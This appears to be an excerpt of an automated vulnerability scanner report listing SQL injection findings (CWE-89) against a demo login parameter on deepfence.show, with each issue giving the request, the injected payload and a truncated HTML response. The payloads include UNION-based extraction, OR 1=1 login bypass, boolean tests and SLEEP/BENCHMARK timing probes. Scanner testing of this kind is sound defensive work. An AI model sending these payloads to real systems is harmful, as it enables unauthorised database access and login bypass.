href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #874\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1234 ' AND 1=0 UNION ALL SELECT 'admin', '\n81dc9bdb52d04dc20036dbd8313ed055\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #875\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7300=7300 AND 'pKlZ'='pKlY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #876\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7300=7300 AND 'pKlZ'='pKlZ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #877Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #878\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #879\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #880\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #881\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #882\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #883\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ') or benchmark(10000000,MD5(1))#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #884\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #885\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #886\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #887\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 